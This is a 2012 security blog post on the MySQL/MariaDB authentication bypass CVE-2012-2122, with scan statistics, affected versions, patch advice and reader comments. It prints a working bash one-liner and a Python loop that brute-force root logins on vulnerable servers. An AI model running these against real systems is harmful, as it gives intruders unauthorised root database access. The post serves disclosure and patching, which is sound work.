• Skip to main content
  • Skip to primary sidebar
  • Skip to footer
  • Home
  • About Darknet
  • Hacking Tools
  • Popular Posts
  • Darknet Archives
  • Contact Darknet
    • Advertise
    • Submit a Tool
Darknet – Hacking Tools, Hacker News & Cyber Security

Darknet - Hacking Tools, Hacker News & Cyber Security

Darknet is your best source for the latest hacking tools, hacker news, cyber security best practices, ethical hacking & pen-testing.

MySQL 1 Liner Hack Gives Root Access Without Password

June 12, 2012

Views: 31,580

The latest news that has hit the streets is the occurence of the easiest hack ever, if you have local shell access (any user privelege level) and you can connect to MySQL – you can get root access to MySQL within a few seconds.

I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo…and it worked in about 30 seconds. Scary really, you can use this single line of bash to hack MySQL:

[sh]while [ 1 ];do mysql -u root –password=123; done[/sh]

Or the Python version I originally saw:

Python
1
2
3
4
5
#!/usr/bin/python
import subprocess
 
while 1:
        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()

Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.

According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name ‘root’.

The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.

Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the “tragically comedic” flaw.

There’s a lot of vulnerable servers out there, so you better hope they aren’t yours because it’s not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.

And if your server is in that state – it’s vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download so I suggest you get on your servers and do –

1
aptitude update; aptitude safe-upgrade

If you are using a shitty OS that uses yum or something – figure it out yourself.

Affected versions, listed below, require for memcmp() to return an arbitrary integer outside of the range -128 to 127. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 were vulnerable, Golubchik said.

Moore and other security boffins identified vulnerable versions in Ubuntu 64-bit versions 10.04, 10.10, 11.04, 11.10, and 12.04, OpenSUSE 12.1 64-bit MySQL 5.5.23, and Fedora. Official builds of MariaDB and MySQL were safe, along with Red Hat Enterprise Linux 4, 5 and 6 and some flavours of Debian Linux and Gentoo 64 bit.

A list of accessible MySQL servers found 356,000 deployments running versions of 5.0.x, followed by 285,000 running 5.1.x, and 134,436 running 5.5.x. Another list of MySQL build flavours revealed 43,900 running Ubuntu, 6408 on Debian, and 98,665 on Windows.

Honestly I find that this is a really serious vulnerability, but has a pretty low risk profile. It will only work in cases of badly configured MySQL users where they accept connections from any IP address – user@% type entries in the user table.

NO ONE should be running root@% – so that would mean the attacker would need local shell access. And well if they have that, it’s pretty much game over anyway.

This vulnerability is notated as CVE-2012-2122.

Source: SC Magazine

Share
Tweet97
Share35
Buffer
WhatsApp
Email
132 Shares

Filed Under: Database Hacking, Exploits/Vulnerabilities, Linux Hacking, Password Cracking Tools Tagged With: database-security, hacking mysql, mysql, mysql security, Password Cracking, password-hacking



Reader Interactions

Comments

  1. inzel says

    June 12, 2012 at 7:39 pm

    Thats pretty crazy. Such a simple hack yet so dangerous.

    Good write up!

  2. Joey says

    June 12, 2012 at 7:50 pm

    Agreed, good write up, though it didn’t work on my Mac OS X homebrew install of MySQL. There’s a typo in your aptitude command. It should be.

    aptitude update; aptitude safe-upgrade

    • Darknet says

      June 13, 2012 at 8:55 am

      Thanks Joey – fixed the typo.

  3. Keith says

    June 13, 2012 at 8:49 am

    Interesting, I can’t get that to work on my test VM which is also running Ubuntu 12.04 server, I may have patched it yesterday though.

    However, I just tried an old server I had, which runs Debian 5 Lenny (not patched) and it didn’t work either.

    • Darknet says

      June 13, 2012 at 8:56 am

      Yah it’s only a few specific versions – it worked on 10.04/12.04 2 days ago – but if you updated yesterday MySQL would be patched.

  4. Godrick says

    June 13, 2012 at 11:18 pm

    >shitty OS
    >exploit only works on Debian based machines

    pick both

  5. d3m4s1@d0v1v0 says

    June 14, 2012 at 1:05 pm

    I’ve tested the exploit on my debian wheezy with a not updated MySQL, and wasn’t vulnerable. I leave it running for an hour o so, and couldn’t get access.
    It’s weird that an exploit like this wasn’t discovered before.

    • Darknet says

      June 14, 2012 at 5:59 pm

      It’s because it’s due to compilation options, it’s not specifically a MySQL error.

  6. Pb says

    June 14, 2012 at 7:00 pm

    useless and gay.

  7. Shiva says

    June 18, 2012 at 12:07 pm

    That works only in case when there is no password for local connection.
    I tested it on debian sid and it is non-exploitable.
    I guess it works only when you do leave possibility of login to mysql as root without specifying password. If you do not set to local root connections be passwordless or anything like that I didnt played a lot with mysql options then you can log as root thru the socket passwordlessly.

    • Darknet says

      June 18, 2012 at 12:57 pm

      No, it works whatever password has been set. It does an incorrect comparison due to compilation options – it works once every 64-128 tries.

  8. Bogwitch says

    June 20, 2012 at 8:39 am

    “NO ONE should be running root@% – so that would mean the attacker would need local shell access. And well if they have that, it’s pretty much game over anyway.”

    An attacker would need local shell access to login as root BUT, if an attacker has done the usual intelligence gathering, they may well have found a username that WILL work remotely. The only reason root is used in the many and varied examples found on the ‘net is the root user is most likely to exist within SQL, it is most likely the only account to have any form of protection, too!

    • Darknet says

      June 20, 2012 at 10:02 am

      That’s very true – it’s just that root is the low hanging fruit in this case and it generally has the most access (system tables etc) – where as specific accounts usually have access to only 1 table.

  9. Prashant Pandey says

    July 21, 2012 at 11:42 am

    Interesting, I call it an easy tool for beginners especially in Indian/ south Asian countries environment where responsible even are not much aware about root access & security. Even if some do than their pirated OS/ software’s revert them a kick.
    Keep writing up man, Nice effort.

Primary Sidebar

Search Darknet

  • Email
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Advertise on Darknet

Latest Posts

Bantam - Advanced PHP Backdoor Management Tool For Post Exploitation

Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation

Views: 281

Bantam is a lightweight post-exploitation utility written in C# that includes advanced payload … ...More about Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation

AI-Powered Cybercrime in 2025 - The Dark Web’s New Arms Race

AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race

Views: 493

In 2025, the dark web isn't just a marketplace for illicit goods—it's a development lab. … ...More about AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race

Upload_Bypass - Bypass Upload Restrictions During Penetration Testing

Upload_Bypass – Bypass Upload Restrictions During Penetration Testing

Views: 490

Upload_Bypass is a command-line tool that automates discovering and exploiting weak file upload … ...More about Upload_Bypass – Bypass Upload Restrictions During Penetration Testing

Shell3r - Powerful Shellcode Obfuscator for Offensive Security

Shell3r – Powerful Shellcode Obfuscator for Offensive Security

Views: 687

If antivirus and EDR vendors are getting smarter, so are the tools that red teamers and penetration … ...More about Shell3r – Powerful Shellcode Obfuscator for Offensive Security

Understanding the Deep Web, Dark Web, and Darknet (2025 Guide)

Understanding the Deep Web, Dark Web, and Darknet (2025 Guide)

Views: 8,438

Introduction: How Much of the Internet Can You See? You're only scratching the surface when you … ...More about Understanding the Deep Web, Dark Web, and Darknet (2025 Guide)

DataSurgeon is an open-source Linux-based data extraction and transformation tool designed for forensic investigations and recovery scenarios.

DataSurgeon – Fast, Flexible Data Extraction and Transformation Tool for Linux

Views: 468

DataSurgeon is an open-source Linux-based data extraction and transformation tool designed for … ...More about DataSurgeon – Fast, Flexible Data Extraction and Transformation Tool for Linux

Topics

  • Advertorial (28)
  • Apple (46)
  • Countermeasures (227)
  • Cryptography (82)
  • Database Hacking (89)
  • Events/Cons (7)
  • Exploits/Vulnerabilities (431)
  • Forensics (65)
  • GenAI (3)
  • Hacker Culture (8)
  • Hacking News (229)
  • Hacking Tools (684)
  • Hardware Hacking (82)
  • Legal Issues (179)
  • Linux Hacking (73)
  • Malware (238)
  • Networking Hacking Tools (352)
  • Password Cracking Tools (104)
  • Phishing (41)
  • Privacy (219)
  • Secure Coding (118)
  • Security Software (233)
  • Site News (51)
    • Authors (6)
  • Social Engineering (37)
  • Spammers & Scammers (76)
  • Stupid E-mails (6)
  • Telecomms Hacking (6)
  • UNIX Hacking (6)
  • Virology (6)
  • Web Hacking (384)
  • Windows Hacking (169)
  • Wireless Hacking (45)

Security Blogs

  • Dancho Danchev
  • F-Secure Weblog
  • Google Online Security
  • Graham Cluley
  • Internet Storm Center
  • Krebs on Security
  • Schneier on Security
  • TaoSecurity
  • Troy Hunt

Security Links

  • Exploits Database
  • Linux Security
  • Register – Security
  • SANS
  • Sec Lists
  • US CERT

Footer

Most Viewed Posts

  • Brutus Password Cracker – Download brutus-aet2.zip AET2 (2,291,624)
  • Darknet – Hacking Tools, Hacker News & Cyber Security (2,173,069)
  • Top 15 Security Utilities & Download Hacking Tools (2,096,614)
  • 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) (1,199,675)
  • Password List Download Best Word List – Most Common Passwords (933,461)
  • wwwhack 1.9 – wwwhack19.zip Web Hacking Software Free Download (776,130)
  • Hack Tools/Exploits (673,286)
  • Wep0ff – Wireless WEP Key Cracker Tool (530,143)

Search

Recent Posts

  • Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation May 9, 2025
  • AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race May 7, 2025
  • Upload_Bypass – Bypass Upload Restrictions During Penetration Testing May 5, 2025
  • Shell3r – Powerful Shellcode Obfuscator for Offensive Security May 2, 2025
  • Understanding the Deep Web, Dark Web, and Darknet (2025 Guide) April 30, 2025
  • DataSurgeon – Fast, Flexible Data Extraction and Transformation Tool for Linux April 28, 2025

Tags

apple botnets computer-security darknet Database Hacking ddos dos exploits fuzzing google hacking-networks hacking-websites hacking-windows hacking tool Information-Security information gathering Legal Issues malware microsoft network-security Network Hacking Password Cracking pen-testing penetration-testing Phishing Privacy Python scammers Security Security Software spam spammers sql-injection trojan trojans virus viruses vulnerabilities web-application-security web-security windows windows-security Windows Hacking worms XSS

Copyright © 1999–2025 Darknet All Rights Reserved · Privacy Policy